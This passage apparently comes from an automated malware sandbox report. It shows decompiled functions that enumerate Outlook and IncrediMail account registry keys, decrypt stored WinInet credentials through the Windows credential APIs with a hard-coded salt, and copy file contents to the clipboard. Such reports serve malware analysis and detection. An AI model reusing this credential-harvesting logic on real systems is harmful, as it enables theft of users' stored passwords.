				if(_t35 == 0) {
					_v12 = 0;
					_v276 = 0;
					memset( &_v275, 0, 0xff);
					_t40 = E0040EC05(_v8, 0,  &_v276);
					_t75 = _t74 + 0x18;
					if(_t40 == 0) {
						_t66 = "%s\\%s";
						do {
							_t69 = _a4;
							E0040EBC1(_t64, _v8,  &_v276, "Username", _a4 + 0xa9c, 0x7f);
							_v1300 = 0;
							memset( &_v1299, 0, 0x3ff);
							sprintf( &_v1300, _t66,  &_v276, "Software\\Microsoft\\Internet Account Manager\\Accounts");
							_t52 = E0040EB3F(_v8,  &_v1300,  &_v16);
							_t76 = _t75 + 0x3c;
							_t80 = _t52;
							if(_t52 == 0) {
								E00402BB8(_t64,  &_v16, _t80, _t83, _t69, 1);
							}
							sprintf( &_v1300, _t66,  &_v276, "Software\\Microsoft\\Office\\Outlook\\OMI Account Manager\\Accounts");
							_t58 = E0040EB3F(_v8,  &_v1300,  &_v20);
							_t77 = _t76 + 0x1c;
							_t81 = _t58;
							if(_t58 == 0) {
								E00402BB8(_t64,  &_v20, _t81, _t83, _a4, 5);
							}
							_v12 = _v12 + 1;
							_t60 = E0040EC05(_v8, _v12,  &_v276);
							_t75 = _t77 + 0xc;
						} while (_t60 == 0);
					}
					RegCloseKey(_v8);
				}
				_t36 = _a4;
				 *((char*)(_t36 + 0xa9c)) = 0;
				return _t36;
			}

0x00402c44
0x00402c44
0x00402c5c
0x00402c61
0x00402c68
0x00402c7b
0x00402c7e
0x00402c84
0x00402c94
0x00402c99
0x00402c9e
0x00402ca6
0x00402cab
0x00402cab
0x00402cc6
0x00402cd8
0x00402cde
0x00402cf7
0x00402d0a
0x00402d0f
0x00402d12
0x00402d14
0x00402d1c
0x00402d1c
0x00402d35
0x00402d48
0x00402d4d
0x00402d50
0x00402d52
0x00402d5c
0x00402d5c
0x00402d61
0x00402d71
0x00402d76
0x00402d79
0x00402d82
0x00402d86
0x00402d86
0x00402d8c
0x00402d8f
0x00402d97

APIs

Part of subcall function 0040EB3F: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,0040EEE8,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 0040EB52

memset.MSVCRT ref: 00402C84

Part of subcall function 0040EC05: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 0040EC28

RegCloseKey.ADVAPI32(?), ref: 00402D86

Part of subcall function 0040EBC1: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 0040EBFA

memset.MSVCRT ref: 00402CDE
sprintf.MSVCRT ref: 00402CF7
sprintf.MSVCRT ref: 00402D35

Part of subcall function 00402BB8: memset.MSVCRT ref: 00402BD8
Part of subcall function 00402BB8: RegCloseKey.ADVAPI32 ref: 00402C3C

Strings

Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts, xrefs: 00402D21
%s\%s, xrefs: 00402CA6, 00402CF5, 00402D33
Software\Microsoft\Internet Account Manager\Accounts, xrefs: 00402CE3
Identities, xrefs: 00402C52
Username, xrefs: 00402CB7

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Closememset$sprintf$EnumOpen
String ID: %s\%s$Identities$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Username
API String ID: 1831126014-3814494228
Opcode ID: e558669e5098f51d47a130cd26e8095db06e1949dd15f7d6cacb61a667ea587b
Instruction ID: 6c0256c292ffb55b53f7a2730c4bcad7d13cefd93b753116a94389aae211c0df
Opcode Fuzzy Hash: e558669e5098f51d47a130cd26e8095db06e1949dd15f7d6cacb61a667ea587b
Instruction Fuzzy Hash: 25315C72D0011DBADB11EA96CD46EEFB77CAF04344F0405BABA19F2091E6B49F988F54

Uniqueness

Uniqueness Score: -1.00%

Function 0040B53C, Relevance: 16.6, APIs: 11, Instructions: 133
windowCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E0040B53C(void* __ecx, intOrPtr _a4, signed int _a8, intOrPtr _a12) {
				void* _v8;
				intOrPtr _v20;
				void* _v24;
				void* _v28;
				void* __ebx;
				void* __esi;
				signed int _t45;
				intOrPtr _t50;
				signed int _t53;
				intOrPtr _t82;
				signed char _t86;
				intOrPtr _t88;
				intOrPtr _t90;
				void* _t91;
				void* _t92;

				_t84 = __ecx;
				_t88 = _a4;
				_t92 = _t88 - 0x402;
				_t91 = __ecx;
				if(_t92 > 0) {
					_t45 = _t88 - 0x415;
					__eflags = _t45;
					if(_t45 == 0) {
						E0040A4C8(__ecx);
						L22:
						__eflags = 0;
						E0040A27F(0, _t84, _t91, 0);
						L23:
						if(_t88 ==  *((intOrPtr*)(_t91 + 0x374))) {
							_t81 = _a12;
							_t86 =  *(_a12 + 0xc);
							_t50 =  *((intOrPtr*)(_t91 + 0x370));
							if((_t86 & 0x00000008) == 0) {
								__eflags = _t86 & 0x00000040;
								if((_t86 & 0x00000040) != 0) {
									 *0x4171ac =  *0x4171ac & 0x00000000;
									__eflags =  *0x4171ac;
									SetFocus( *(_t50 + 0x184));
								}
							} else {
								E00409D7E(_t50, _t81);
							}
						}
						return E004019AC(_t91, _t88, _a8, _a12);
					}
					_t53 = _t45 - 1;
					__eflags = _t53;
					if(_t53 == 0) {
						E0040A56C(__ecx);
						goto L22;
					}
					__eflags = _t53 == 6;
					if(_t53 == 6) {
						SetFocus( *(__ecx + 0x378));
					}
					goto L23;
				}
				if(_t92 == 0) {
					 *(__ecx + 0x25c) =  *(__ecx + 0x25c) & 0x00000000;
					E0040A437(__ecx);
					goto L22;
				}
				if(_t88 == 0x1c) {
					__eflags = _a8;
					if(_a8 == 0) {
						 *((intOrPtr*)(_t91 + 0x378)) = GetFocus();
					} else {
						PostMessageA( *(__ecx + 0x108), 0x41c, 0, 0);
					}
					goto L23;
				}
				if(_t88 == 0x20) {
					__eflags = _a8 -  *((intOrPtr*)(__ecx + 0x114));
					if(_a8 !=  *((intOrPtr*)(__ecx + 0x114))) {
						goto L23;
					}
					SetCursor(LoadCursorA( *0x416b94, 0x67));
					return 1;
				}
				if(_t88 == 0x2b) {
					_t82 = _a12;
					__eflags =  *((intOrPtr*)(_t82 + 0x14)) -  *((intOrPtr*)(__ecx + 0x114));
					if( *((intOrPtr*)(_t82 + 0x14)) ==  *((intOrPtr*)(__ecx + 0x114))) {
						SetBkMode( *(_t82 + 0x18), 1);
						SetTextColor( *(_t82 + 0x18), 0xff0000);
						_v8 = SelectObject( *(_t82 + 0x18),  *(__ecx + 0x258));
						asm("stosd");
						asm("stosd");
						asm("stosd");
						asm("stosd");
						_t90 = _a12;
						_v28 = 0x14;
						_v20 = 5;
						DrawTextExA( *(_t90 + 0x18), __ecx + 0x158, 0xffffffff, _t90 + 0x1c, 4,  &_v28);
						SelectObject( *(_t90 + 0x18), _v8);
						_t88 = _a4;
					}
				} else {
					if(_t88 == 0x7b) {
						_t87 = _a8;
						if(_a8 ==  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x370)) + 0x184))) {
							E0040B372(__ecx, _t87);
						}
					}
				}
				goto L23;
			}

0x0040b53c
0x0040b545
0x0040b54d
0x0040b54f
0x0040b551
0x0040b689
0x0040b689
0x0040b68e
0x0040b6b1
0x0040b6b6
0x0040b6b6
0x0040b6b8
0x0040b6bd
0x0040b6c3
0x0040b6c5
0x0040b6c8
0x0040b6ce
0x0040b6d4
0x0040b6dd
0x0040b6e0
0x0040b6e8
0x0040b6e8
0x0040b6ef
0x0040b6ef
0x0040b6d6
0x0040b6d6
0x0040b6d6
0x0040b6d4
0x00000000
0x0040b6fe
0x0040b690
0x0040b690
0x0040b691
0x0040b6a8
0x00000000
0x0040b6a8
0x0040b693
0x0040b696
0x0040b69e
0x0040b69e
0x00000000
0x0040b696
0x0040b557
0x0040b679
0x0040b680
0x00000000
0x0040b680
0x0040b560
0x0040b651
0x0040b654
0x0040b671
0x0040b656
0x0040b663
0x0040b663
0x00000000
0x0040b654
0x0040b569
0x0040b626
0x0040b62c
0x00000000
0x00000000
0x0040b641
0x00000000
0x0040b649
0x0040b572
0x0040b59e
0x0040b5a4
0x0040b5aa
0x0040b5b5
0x0040b5c3
0x0040b5da
0x0040b5e2
0x0040b5e3
0x0040b5e4
0x0040b5e5
0x0040b5e6
0x0040b5ff
0x0040b606
0x0040b60d
0x0040b619
0x0040b61b
0x0040b61b
0x0040b574
0x0040b577
0x0040b583
0x0040b58c
0x0040b594
0x0040b594
0x0040b58c
0x0040b577
0x00000000

APIs

SetBkMode.GDI32(?,00000001), ref: 0040B5B5
SetTextColor.GDI32(?,00FF0000), ref: 0040B5C3
SelectObject.GDI32(?,?), ref: 0040B5D8
DrawTextExA.USER32(?,?,000000FF,?,00000004,?), ref: 0040B60D
SelectObject.GDI32(00000014,?), ref: 0040B619

Part of subcall function 0040B372: GetCursorPos.USER32(?), ref: 0040B37F
Part of subcall function 0040B372: GetSubMenu.USER32 ref: 0040B38D
Part of subcall function 0040B372: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0040B3BA

LoadCursorA.USER32 ref: 0040B63A
SetCursor.USER32(00000000), ref: 0040B641
PostMessageA.USER32(?,0000041C,00000000,00000000), ref: 0040B663
SetFocus.USER32(?), ref: 0040B69E
SetFocus.USER32(?), ref: 0040B6EF

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Cursor$FocusMenuObjectSelectText$ColorDrawLoadMessageModePopupPostTrack
String ID:
API String ID: 1416211542-0
Opcode ID: ada7ac9db0802c40b78b434d5b067a752f7538f931aaa86afb59dd9be5820f54
Instruction ID: 8f05fcf81e8b57b2917fe7890bba9475612e1218cdf4c3fdd04c744704700eb5
Opcode Fuzzy Hash: ada7ac9db0802c40b78b434d5b067a752f7538f931aaa86afb59dd9be5820f54
Instruction Fuzzy Hash: E741A271100605EFCB119F64CD89EEE7775FB08300F104936E615A62A1CB799D91DBDE

Uniqueness

Uniqueness Score: -1.00%

Function 00405FC6, Relevance: 16.6, APIs: 11, Instructions: 58
clipboardmemoryfileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405FC6(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				long _v8;
				void* _v12;
				long _v16;
				void* _t14;
				void* _t29;
				void* _t34;
				long _t36;

				_v8 = _v8 & 0x00000000;
				EmptyClipboard();
				_t14 = E00405ECB(_a4);
				_v12 = _t14;
				if(_t14 == 0xffffffff) {
					_v8 = GetLastError();
				} else {
					_t36 = GetFileSize(_t14, 0);
					_t5 = _t36 + 1; // 0x1
					_t29 = GlobalAlloc(0x2000, _t5);
					if(_t29 == 0) {
						L4:
						_v8 = GetLastError();
					} else {
						_t34 = GlobalLock(_t29);
						if(ReadFile(_v12, _t34, _t36,  &_v16, 0) == 0) {
							goto L4;
						} else {
							 *((char*)(_t34 + _t36)) = 0;
							GlobalUnlock(_t29);
							SetClipboardData(1, _t29);
						}
					}
					CloseHandle(_v12);
				}
				CloseClipboard();
				return _v8;
			}

0x00405fcc
0x00405fd0
0x00405fd9
0x00405fe2
0x00405fe5
0x0040605b
0x00405fe7
0x00405ff3
0x00405ff5
0x00406004
0x00406008
0x0040603e
0x00406044
0x0040600a
0x00406013
0x00406026
0x00000000
0x00406028
0x00406029
0x0040602d
0x00406036
0x00406036
0x00406026
0x0040604a
0x00406052
0x0040605e
0x00406068

APIs

EmptyClipboard.USER32 ref: 00405FD0

Part of subcall function 00405ECB: CreateFileA.KERNEL32(00410C96,80000000,00000001,00000000,00000003,00000000,00000000,00410BD2,?,rA,00410C96,?,?,*.oeaccount,rA,?), ref: 00405EDD

GetFileSize.KERNEL32(00000000,00000000), ref: 00405FED
GlobalAlloc.KERNEL32(00002000,00000001), ref: 00405FFE
GlobalLock.KERNEL32 ref: 0040600B
ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040601E
GlobalUnlock.KERNEL32(00000000), ref: 0040602D
SetClipboardData.USER32 ref: 00406036
GetLastError.KERNEL32 ref: 0040603E
CloseHandle.KERNEL32(?), ref: 0040604A
GetLastError.KERNEL32 ref: 00406055
CloseClipboard.USER32 ref: 0040605E

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
String ID:
API String ID: 3604893535-0
Opcode ID: 5804eb7593f705abb245538e10f585bb03ca14e3a9190401cfadc2aaba18f8ee
Instruction ID: 732aa9399b2cd23c9d945101f46e029b0eae2bee8c87a14991e63b5ea8a72c25
Opcode Fuzzy Hash: 5804eb7593f705abb245538e10f585bb03ca14e3a9190401cfadc2aaba18f8ee
Instruction Fuzzy Hash: 6A113371900205FBDB109BB4DE4DBDE7F78EB08351F118176F606E1190DBB48A20DB69

Uniqueness

Uniqueness Score: -1.00%

Function 0040EDDB, Relevance: 16.6, APIs: 1, Strings: 10, Instructions: 50stringCOMMON

Download Yara Rule

APIs

strcpy.MSVCRT(?,Common Programs,0040EEF9,?,?,?,?,?,00000104), ref: 0040EE4E

Strings

Programs, xrefs: 0040EE14
Common Desktop, xrefs: 0040EE3A
Startup, xrefs: 0040EE06
Start Menu, xrefs: 0040EDFF
Common Programs, xrefs: 0040EE48
Desktop, xrefs: 0040EDF8
Common Start Menu, xrefs: 0040EE1B
Favorites, xrefs: 0040EE0D
AppData, xrefs: 0040EE33
Common Startup, xrefs: 0040EE41

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: strcpy
String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
API String ID: 3177657795-318151290
Opcode ID: 69181002a60778507a3d541a40da82393cbcfb54362146d699c3396572d884a2
Instruction ID: 838bbb5fcb7671a25bd4d31fd75230584a1d4f3c41bb848f6a939ae912ddcdf8
Opcode Fuzzy Hash: 69181002a60778507a3d541a40da82393cbcfb54362146d699c3396572d884a2
Instruction Fuzzy Hash: 66F0BDB32A878EF0D429496BCD4AEB744429151B46B7C4D37A002B46D5E87D8AF260DF

Uniqueness

Uniqueness Score: -1.00%

Function 0040765B, Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 152
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E0040765B(void* __eflags, intOrPtr* _a4) {
				char _v532;
				short _v534;
				void _v1042;
				void _v1044;
				long _v1080;
				intOrPtr _v1084;
				intOrPtr _v1088;
				intOrPtr _v1096;
				int _v1104;
				char _v1108;
				intOrPtr _v1112;
				intOrPtr _v1116;
				intOrPtr _v1120;
				intOrPtr _v1124;
				intOrPtr _v1128;
				intOrPtr _v1132;
				long* _v1136;
				wchar_t* _v1140;
				wchar_t* _v1144;
				intOrPtr _v1148;
				char _v1152;
				intOrPtr _v1156;
				char _v1160;
				void* _v1164;
				void* _v1168;
				int _v1172;
				intOrPtr _v1176;
				char _v1180;
				char _v1184;
				signed int _v1188;
				void* __edi;
				void* __esi;
				void* _t76;
				int _t83;
				wchar_t* _t109;
				wchar_t* _t110;
				signed int _t120;
				int _t126;
				void* _t129;
				intOrPtr _t134;
				signed int _t140;
				void* _t142;
				void* _t143;
				void* _t144;

				_t142 = (_t140 & 0xfffffff8) - 0x4a4;
				_push(_t129);
				_v1108 = 0;
				_v1104 = 0;
				if(E00404647( &_v1108, _t129, __eflags) != 0) {
					_v1184 = 0;
					_v1180 = 0;
					if(_v1088 == 0) {
						_t76 = 0;
						__eflags = 0;
					} else {
						_t76 = _v1084(0, 0,  &_v1180,  &_v1184);
					}
					if(_t76 != 0) {
						_t120 = 9;
						memcpy( &_v1080, L"Microsoft_WinInet", _t120 << 2);
						_t143 = _t142 + 0xc;
						_v1172 = wcslen( &_v1080);
						_v1176 = 1;
						_v1188 = 0;
						if(_v1180 > 0) {
							while(_v1176 != 0) {
								_t134 =  *((intOrPtr*)(_v1184 + _v1188 * 4));
								_t83 = wcsncmp( *(_t134 + 8),  &_v1080, _v1172);
								_t143 = _t143 + 0xc;
								if(_t83 == 0) {
									do {
										_t25 = L"abe2869f-9b47-4cd9-a358-c22904dba7f7" + _t83; // 0x620061
										 *(_t83 + 0x417968) =  *_t25 << 2;
										_t83 = _t83 + 2;
										_t152 = _t83 - 0x4a;
									} while (_t83 < 0x4a);
									_v1148 =  *((intOrPtr*)(_t134 + 0x1c));
									_t139 =  &_v532;
									_v1160 = 0x4a;
									_v1156 = 0x417968;
									_v1152 =  *((intOrPtr*)(_t134 + 0x18));
									E004046D7( &_v532);
									if(E004047A0( &_v532, _t152) != 0 && E00404811(_t139,  &_v1152,  &_v1160,  &_v1168) != 0) {
										_v1044 = 0;
										memset( &_v1042, 0, 0x1fe);
										_t126 = _v1168;
										_t144 = _t143 + 0xc;
										if(_t126 > 0x1fa) {
											_t126 = 0x1fa;
										}
										memcpy( &_v1044, _v1164, _t126);
										_v1120 =  *((intOrPtr*)(_t134 + 0x20));
										_v1124 =  *((intOrPtr*)(_t134 + 4));
										_v1116 =  *((intOrPtr*)(_t134 + 0x10));
										_v1112 =  *((intOrPtr*)(_t134 + 0x14));
										_v1128 =  *((intOrPtr*)(_t134 + 0x2c));
										_v1144 =  *(_t134 + 8);
										_v1132 =  *((intOrPtr*)(_t134 + 0xc));
										_t109 =  &_v1044;
										_v534 = 0;
										_v1140 = _t109;
										_v1136 = 0x4125f4;
										_t110 = wcschr(_t109, 0x3a);
										_t143 = _t144 + 0x14;
										if(_t110 != 0) {
											 *_t110 = 0;
											_v1136 =  &(_t110[0]);
										}
										_v1180 =  *((intOrPtr*)( *_a4))( &_v1144);
										LocalFree(_v1168);
									}
									E004047F1( &_v532);
								}
								_v1188 = _v1188 + 1;
								if(_v1188 < _v1180) {
									continue;
								}
								goto L18;
							}
						}
						L18:
						_v1096(_v1184);
					}
				}
				return E004046C2( &_v1108);
			}

0x00407661
0x0040766b
0x00407670
0x00407674
0x0040767f
0x00407689
0x0040768d
0x00407691
0x004076a8
0x004076a8
0x00407693
0x0040769f
0x0040769f
0x004076ac
0x004076b4
0x004076c3
0x004076c3
0x004076cf
0x004076d3
0x004076db
0x004076df
0x004076e5
0x004076f7
0x00407709
0x0040770e
0x00407713
0x00407719
0x00407719
0x00407724
0x0040772c
0x0040772d
0x0040772d
0x00407735
0x0040773c
0x00407743
0x0040774b
0x00407753
0x00407757
0x00407763
0x00407795
0x0040779d
0x004077a2
0x004077ab
0x004077b0
0x004077b2
0x004077b2
0x004077c1
0x004077c9
0x004077d0
0x004077d7
0x004077de
0x004077e5
0x004077ec
0x004077f3
0x004077f7
0x00407801
0x00407809
0x0040780d
0x00407815
0x0040781a
0x0040781f
0x00407821
0x00407827
0x00407827
0x0040783b
0x0040783f
0x0040783f
0x0040784c
0x0040784c
0x00407851
0x0040785d
0x00000000
0x00000000
0x00000000
0x0040785d
0x004076e5
0x00407863
0x00407867
0x00407867
0x004076ac
0x0040787a

APIs

Part of subcall function 00404647: LoadLibraryA.KERNEL32(advapi32.dll,?,0040D601,80000001,74B5F420), ref: 00404654
Part of subcall function 00404647: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 0040466D
Part of subcall function 00404647: GetProcAddress.KERNEL32(?,CredFree), ref: 00404679
Part of subcall function 00404647: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404685
Part of subcall function 00404647: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404691
Part of subcall function 00404647: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 0040469D

wcslen.MSVCRT ref: 004076C5
wcsncmp.MSVCRT(?,?,?), ref: 00407709
memset.MSVCRT ref: 0040779D
memcpy.MSVCRT ref: 004077C1
wcschr.MSVCRT ref: 00407815
LocalFree.KERNEL32(?,?,?,?,?,?,?), ref: 0040783F

Part of subcall function 004047F1: FreeLibrary.KERNELBASE(?,?), ref: 00404806

Strings

Microsoft_WinInet, xrefs: 004076B9
J, xrefs: 00407743
hyA, xrefs: 0040774B

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: AddressProc$FreeLibrary$LoadLocalmemcpymemsetwcschrwcslenwcsncmp
String ID: J$Microsoft_WinInet$hyA
API String ID: 2413121283-319027496
Opcode ID: 3dbe31861b291603ba55481dc935e5bf9676d9bb6e305c4de7996f9a1c48bd4b
Instruction ID: ab6451454baefbc6762688e22d5ebab6c31fbbbf8d38218599acfc9a6d4ef790
Opcode Fuzzy Hash: 3dbe31861b291603ba55481dc935e5bf9676d9bb6e305c4de7996f9a1c48bd4b
Instruction Fuzzy Hash: 2751E4B1908345AFC710EF65C88495AB7E8FF89304F00492EFA99D3250E778E955CB57

Uniqueness

Uniqueness Score: -1.00%

Function 00402FC2, Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 106
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402FC2(void* __eax, void* __ecx, void* __fp0, void* _a4) {
				void* _v8;
				int _v12;
				int _v16;
				void _v271;
				char _v272;
				void _v527;
				char _v528;
				void _v827;
				char _v828;
				void* __edi;
				void* __esi;
				long _t40;
				void* _t44;
				void* _t55;
				void* _t60;
				void* _t66;
				void* _t67;
				void* _t71;
				void* _t72;
				void* _t73;
				void* _t74;
				void* _t77;

				_t77 = __fp0;
				_t66 = __ecx;
				_t67 = __eax;
				_t40 = E0040EB3F(_a4, "Software\\IncrediMail\\Identities",  &_a4);
				_t72 = _t71 + 0xc;
				if(_t40 == 0) {
					_v12 = 0;
					_v272 = 0;
					memset( &_v271, 0, 0xff);
					_t44 = E0040EC05(_a4, 0,  &_v272);
					_t73 = _t72 + 0x18;
					while(_t44 == 0) {
						E0040EBC1(_t66, _a4,  &_v272, "Identity", _t67 + 0xa9c, 0x7f);
						_v828 = 0;
						memset( &_v827, 0, 0x12b);
						sprintf( &_v828, "%s\\Accounts",  &_v272);
						_t55 = E0040EB3F(_a4,  &_v828,  &_v8);
						_t74 = _t73 + 0x38;
						if(_t55 == 0) {
							_v16 = 0;
							_v528 = 0;
							memset( &_v527, 0, 0xff);
							_t60 = E0040EC05(_v8, 0,  &_v528);
							_t74 = _t74 + 0x18;
							while(_t60 == 0) {
								E00402D9A(_t66, _t67, 0xff, _t77, _v8,  &_v528);
								_v16 = _v16 + 1;
								_t60 = E0040EC05(_v8, _v16,  &_v528);
								_t74 = _t74 + 0xc;
							}
							RegCloseKey(_v8);
						}
						_v12 = _v12 + 1;
						_t44 = E0040EC05(_a4, _v12,  &_v272);
						_t73 = _t74 + 0xc;
					}
					_t40 = RegCloseKey(_a4);
				}
				 *((char*)(_t67 + 0xa9c)) = 0;
				return _t40;
			}

0x00402fc2
0x00402fc2
0x00402fcd
0x00402fdb
0x00402fe0
0x00402fe7
0x00402ffc
0x00402fff
0x00403005
0x00403015
0x0040301a
0x00403101
0x0040303a
0x0040304c
0x00403052
0x0040306a
0x0040307d
0x00403082
0x00403087
0x00403092
0x00403095
0x0040309b
0x004030ab
0x004030b0
0x004030dc
0x004030bf
0x004030c4
0x004030d4
0x004030d9
0x004030d9
0x004030e3
0x004030e3
0x004030e9
0x004030f9
0x004030fe
0x004030fe
0x0040310c
0x00403112
0x00403113
0x0040311c

APIs

Part of subcall function 0040EB3F: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,0040EEE8,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 0040EB52

memset.MSVCRT ref: 00403005

Part of subcall function 0040EC05: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 0040EC28

memset.MSVCRT ref: 00403052
sprintf.MSVCRT ref: 0040306A
memset.MSVCRT ref: 0040309B
RegCloseKey.ADVAPI32(?), ref: 004030E3
RegCloseKey.ADVAPI32(?), ref: 0040310C

Strings

Software\IncrediMail\Identities, xrefs: 00402FD3
%s\Accounts, xrefs: 00403064
Identity, xrefs: 0040302B

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: memset$Close$EnumOpensprintf
String ID: %s\Accounts$Identity$Software\IncrediMail\Identities
API String ID: 3672803090-3168940695
Opcode ID: 0cf548ca034e9c156653f3b1dbb9e895c43ca7fac2608918d84bd2d804a0d0b2
Instruction ID: 2ec2bfd25db4f87ede08292043277b4916c0dadc31aa5cf960337fea200e46ca
Opcode Fuzzy Hash: 0cf548ca034e9c156653f3b1dbb9e895c43ca7fac2608918d84bd2d804a0d0b2
Instruction Fuzzy Hash: D6314EB290021CBADB11EB95CC81EEEBB7CAF14344F0041B6B909A1051E7799F948F64

Uniqueness

Uniqueness Score: -1.00%

Function 00407A64, Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101
windowstringCOMMON

Download Yara Rule

C-Code - Quality: 48%

			E00407A64(void* __ecx, void* __eflags, int _a4, struct tagMENUITEMINFOA _a8, intOrPtr _a12, int _a24, intOrPtr _a28, char* _a44, int _a48, char _a56, void _a57, char _a4160, void _a4161) {
				char* _v0;
				int _v4;
				int _t39;
				char* _t49;
				void* _t51;
				int _t64;
				signed int _t70;
				signed int _t71;

				_t59 = __ecx;
				_t71 = _t70 & 0xfffffff8;
				E004118A0(0x204c, __ecx);
				_t39 = GetMenuItemCount(_a8.cbSize);
				_a4 = _t39;
				_v4 = 0;
				if(_t39 <= 0) {
					L15:
					return _t39;
				} else {
					do {
						memset( &_a57, 0, 0x1000);
						_t71 = _t71 + 0xc;
						_a44 =  &_a56;
						_a8.cbSize = 0x30;
						_a12 = 0x36;
						_a48 = 0x1000;
						_a56 = 0;
						if(GetMenuItemInfoA(_a8.cbSize, _v4, 1,  &_a8) == 0) {
							goto L14;
						}
						if(_a56 == 0) {
							L12:
							_t80 = _a28;
							if(_a28 != 0) {
								_push(0);
								_push(_a28);
								_push(_a4);
								E00407A64(_t59, _t80);
								_t71 = _t71 + 0xc;
							}
							goto L14;
						}
						_t64 = _a24;
						_a4160 = 0;
						memset( &_a4161, 0, 0x1000);
						_t49 = strchr( &_a56, 9);
						_t71 = _t71 + 0x14;
						_v0 = _t49;
						if(_a28 != 0) {
							if(_a12 == 0) {
								 *0x4171b4 =  *0x4171b4 + 1;
								_t64 =  *0x4171b4 + 0x11558;
								__eflags = _t64;
							} else {
								_t64 = _v4 + 0x11171;
							}
						}
						_t51 = E00407D89(_t64,  &_a4160);
						_pop(_t59);
						if(_t51 != 0) {
							if(_v0 != 0) {
								strcat( &_a4160, _v0);
								_pop(_t59);
							}
							ModifyMenuA(_a8, _v4, 0x400, _t64,  &_a4160);
						}
						goto L12;
						L14:
						_v4 = _v4 + 1;
						_t39 = _v4;
					} while (_t39 < _a4);
					goto L15;
				}
			}

0x00407a64
0x00407a67
0x00407a6f
0x00407a7a
0x00407a84
0x00407a88
0x00407a8c
0x00407bb2
0x00407bb8
0x00407a92
0x00407a97
0x00407a9e
0x00407aa3
0x00407aaa
0x00407ab9
0x00407ac4
0x00407acc
0x00407ad0
0x00407adc
0x00000000
0x00000000
0x00407ae6
0x00407b8a
0x00407b8a
0x00407b8e
0x00407b90
0x00407b91
0x00407b95
0x00407b98
0x00407b9d
0x00407b9d
0x00000000
0x00407b8e
0x00407aec
0x00407afa
0x00407b01
0x00407b0d
0x00407b12
0x00407b19
0x00407b1d
0x00407b22
0x00407b30
0x00407b3c
0x00407b3c
0x00407b24
0x00407b28
0x00407b28
0x00407b22
0x00407b4b
0x00407b53
0x00407b54
0x00407b5a
0x00407b68
0x00407b6e
0x00407b6e
0x00407b84
0x00407b84
0x00000000
0x00407ba0
0x00407ba0
0x00407ba4
0x00407ba8
0x00000000
0x00407a97

APIs

GetMenuItemCount.USER32 ref: 00407A7A
memset.MSVCRT ref: 00407A9E
GetMenuItemInfoA.USER32 ref: 00407AD4
memset.MSVCRT ref: 00407B01
strchr.MSVCRT ref: 00407B0D
strcat.MSVCRT(?,?,?,?,?,00000001,?), ref: 00407B68
ModifyMenuA.USER32(?,?,00000400,?,?), ref: 00407B84

Strings

0, xrefs: 00407AB9
6, xrefs: 00407AC4

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Menu$Itemmemset$CountInfoModifystrcatstrchr
String ID: 0$6
API String ID: 1757351179-3849865405
Opcode ID: 0312b36b69dc19ec32793f3e1a4e0bacee62623ae2581f679c82ae12aac676fd
Instruction ID: 1677788af10e21d8d50b2ad3b046da146c202dfcbfc60db105475917acddfa9f
Opcode Fuzzy Hash: 0312b36b69dc19ec32793f3e1a4e0bacee62623ae2581f679c82ae12aac676fd
